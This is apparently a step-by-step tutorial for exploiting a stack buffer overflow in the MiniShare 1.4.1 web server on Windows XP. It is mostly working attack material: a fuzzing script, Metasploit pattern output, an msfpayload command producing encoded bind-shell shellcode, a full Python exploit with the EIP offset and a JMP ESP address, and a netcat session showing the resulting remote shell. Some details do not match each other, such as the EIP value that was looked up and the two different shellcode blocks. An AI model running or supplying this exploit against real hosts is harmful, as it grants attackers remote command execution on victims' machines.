Win32 Exploitation

Prerequisite
 Minishare 1.4.1
 Debugger (I use Immunity debugger)
 window xp (victim)
 linux (with python, metasploit and nc installed) 
 
 Running minishare
 Minishare is minimal HTTP server that can browse and download file from web and easily can run with the exe file. Fuzzing minishare In order to exploit the minishare, need to fuzz the vulnerability, minishare is vuln to buffer overflow, fuzz with the following python script.
 
 
 #!/usr/bin/env python
 import socket, sys
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((sys.argv[1], 80))
 buffer = “GET “
 buffer += “A”*2000
 buffer += “HTTP/1.1\r\n\r\n”
 s.send(buffer)
 s.close()
 
 
 In window xp, minishare program will be crash.
 So, to figure out the crash point attach minishare program with the immunity debugger.
 Run again, The EIP register will be overwrite with the 42424242 in ascii AAAA ,
 To get the crash point, run with the pattern_create.rb in metasploit following command,
 
 
 root@kth-kali:/usr/share/metasploit-framework/tools# ./pattern_create.rb 2000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co

 
 
 copy the payload and replace with the value of buffer A*2000
 Run again ..
 This time, In windows machine EIP will generate with some value 36684365 or something else.
 To get offset , use pattern_offset.rb
 
 
 root@kth-kali:/usr/share/metasploit-framework/tools# ./pattern_offset.rb 36684335
 [*] Exact match at offset 1787
 
 Finally, we get crash point , generate the payload shellcode,
 
 
 
 
 
 root@kth-kali:~# msfpayload windows/shell_bind_tcp R |msfencode -a x86 -b “\x00\x0d” -t c 
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

unsigned char buf[] = 
“\xbe\x6d\xab\x4c\xb3\xdb\xc2\xd9\x74\x24\xf4\x5f\x31\xc9\xb1”
“\x56\x31\x77\x13\x83\xc7\x04\x03\x77\x62\x49\xb9\x4f\x94\x04”
“\x42\xb0\x64\x77\xca\x55\x55\xa5\xa8\x1e\xc7\x79\xba\x73\xeb”
“\xf2\xee\x67\x78\x76\x27\x87\xc9\x3d\x11\xa6\xca\xf3\x9d\x64”
“\x08\x95\x61\x77\x5c\x75\x5b\xb8\x91\x74\x9c\xa5\x59\x24\x75”
“\xa1\xcb\xd9\xf2\xf7\xd7\xd8\xd4\x73\x67\xa3\x51\x43\x13\x19”
“\x5b\x94\x8b\x16\x13\x0c\xa0\x71\x84\x2d\x65\x62\xf8\x64\x02”
“\x51\x8a\x76\xc2\xab\x73\x49\x2a\x67\x4a\x65\xa7\x79\x8a\x42”
“\x57\x0c\xe0\xb0\xea\x17\x33\xca\x30\x9d\xa6\x6c\xb3\x05\x03”
“\x8c\x10\xd3\xc0\x82\xdd\x97\x8f\x86\xe0\x74\xa4\xb3\x69\x7b”
“\x6b\x32\x29\x58\xaf\x1e\xea\xc1\xf6\xfa\x5d\xfd\xe9\xa3\x02”
“\x5b\x61\x41\x57\xdd\x28\x0e\x94\xd0\xd2\xce\xb2\x63\xa0\xfc”
“\x1d\xd8\x2e\x4d\xd6\xc6\xa9\xb2\xcd\xbf\x26\x4d\xed\xbf\x6f”
“\x8a\xb9\xef\x07\x3b\xc1\x7b\xd8\xc4\x14\x2b\x88\x6a\xc6\x8c”
“\x78\xcb\xb6\x64\x93\xc4\xe9\x95\x9c\x0e\x9c\x91\x52\x6a\xcd”
“\x75\x97\x8c\xe0\xd9\x1e\x6a\x68\xf2\x76\x24\x04\x30\xad\xfd”
“\xb3\x4b\x87\x51\x6c\xdc\x9f\xbf\xaa\xe3\x1f\xea\x99\x48\xb7”
“\x7d\x69\x83\x0c\x9f\x6e\x8e\x24\xd6\x57\x59\xbe\x86\x1a\xfb”
“\xbf\x82\xcc\x98\x52\x49\x0c\xd6\x4e\xc6\x5b\xbf\xa1\x1f\x09”
“\x2d\x9b\x89\x2f\xac\x7d\xf1\xeb\x6b\xbe\xfc\xf2\xfe\xfa\xda”
“\xe4\xc6\x03\x67\x50\x97\x55\x31\x0e\x51\x0c\xf3\xf8\x0b\xe3”
“\x5d\x6c\xcd\xcf\x5d\xea\xd2\x05\x28\x12\x62\xf0\x6d\x2d\x4b”
“\x94\x79\x56\xb1\x04\x85\x8d\x71\x34\xcc\x8f\xd0\xdd\x89\x5a”
“\x61\x80\x29\xb1\xa6\xbd\xa9\x33\x57\x3a\xb1\x36\x52\x06\x75”
“\xab\x2e\x17\x10\xcb\x9d\x18\x31”;

 
 take the shellcode and use it in following script,
 
 
 
 
 #!/usr/bin/env python
 import socket, sys
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80))
 buffer = “GET “
 buffer += “A”*1787
 buffer += “\x65\x82\xa5\x7c”
 buffer += “\x90”*20
 
 buffer += (“\xb8\xc1\xc9\xb4\x11\xd9\xc4\xd9\x74\x24\xf4\x5a\x31\xc9\xb1” “\x56\x31\x42\x13\x03\x42\x13\x83\xea\x3d\x2b\x41\xed\x55\x25”
 “\xaa\x0e\xa5\x56\x22\xeb\x94\x44\x50\x7f\x84\x58\x12\x2d\x24”
 “\x12\x76\xc6\xbf\x56\x5f\xe9\x08\xdc\xb9\xc4\x89\xd0\x05\x8a”
 “\x49\x72\xfa\xd1\x9d\x54\xc3\x19\xd0\x95\x04\x47\x1a\xc7\xdd”
 “\x03\x88\xf8\x6a\x51\x10\xf8\xbc\xdd\x28\x82\xb9\x22\xdc\x38”
 “\xc3\x72\x4c\x36\x8b\x6a\xe7\x10\x2c\x8a\x24\x43\x10\xc5\x41”
 “\xb0\xe2\xd4\x83\x88\x0b\xe7\xeb\x47\x32\xc7\xe6\x96\x72\xe0”
 “\x18\xed\x88\x12\xa5\xf6\x4a\x68\x71\x72\x4f\xca\xf2\x24\xab”
 “\xea\xd7\xb3\x38\xe0\x9c\xb0\x67\xe5\x23\x14\x1c\x11\xa8\x9b”
 “\xf3\x93\xea\xbf\xd7\xf8\xa9\xde\x4e\xa5\x1c\xde\x91\x01\xc1”
 “\x7a\xd9\xa0\x16\xfc\x80\xac\xdb\x33\x3b\x2d\x73\x43\x48\x1f”
 “\xdc\xff\xc6\x13\x95\xd9\x11\x53\x8c\x9e\x8e\xaa\x2e\xdf\x87”
 “\x68\x7a\x8f\xbf\x59\x02\x44\x40\x65\xd7\xcb\x10\xc9\x87\xab”
 “\xc0\xa9\x77\x44\x0b\x26\xa8\x74\x34\xec\xdf\xb2\xfa\xd4\x8c”
 “\x54\xff\xea\x23\xf9\x76\x0c\x29\x11\xdf\x86\xc5\xd3\x04\x1f”
 “\x72\x2b\x6f\x33\x2b\xbb\x27\x5d\xeb\xc4\xb7\x4b\x58\x68\x1f”
 “\x1c\x2a\x62\xa4\x3d\x2d\xaf\x8c\x34\x16\x38\x46\x29\xd5\xd8”
 “\x57\x60\x8d\x79\xc5\xef\x4d\xf7\xf6\xa7\x1a\x50\xc8\xb1\xce”
 “\x4c\x73\x68\xec\x8c\xe5\x53\xb4\x4a\xd6\x5a\x35\x1e\x62\x79”
 “\x25\xe6\x6b\xc5\x11\xb6\x3d\x93\xcf\x70\x94\x55\xb9\x2a\x4b”
 “\x3c\x2d\xaa\xa7\xff\x2b\xb3\xed\x89\xd3\x02\x58\xcc\xec\xab”
 “\x0c\xd8\x95\xd1\xac\x27\x4c\x52\xdc\x6d\xcc\xf3\x75\x28\x85”
 “\x41\x18\xcb\x70\x85\x25\x48\x70\x76\xd2\x50\xf1\x73\x9e\xd6”
 “\xea\x09\x8f\xb2\x0c\xbd\xb0\x96”) buffer += “HTTP/1.1\r\n\r\n”
 
 s.send(buffer)
 s.close()
 
 \x65\x82\xa5\x7c is the JMP ESP address of the shell32.dll in windows machine.
 you will get the shell when you connect with netcat
 
 
 root@kth-kali:~/python# nc 192.168.1.128 4444
 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985–2001 Microsoft Corp.
 C:\Program Files\MiniShare>

https://www.facebook.com/patriot.k89/videos/vb.100000863016810/994609570577801/?type=3&theater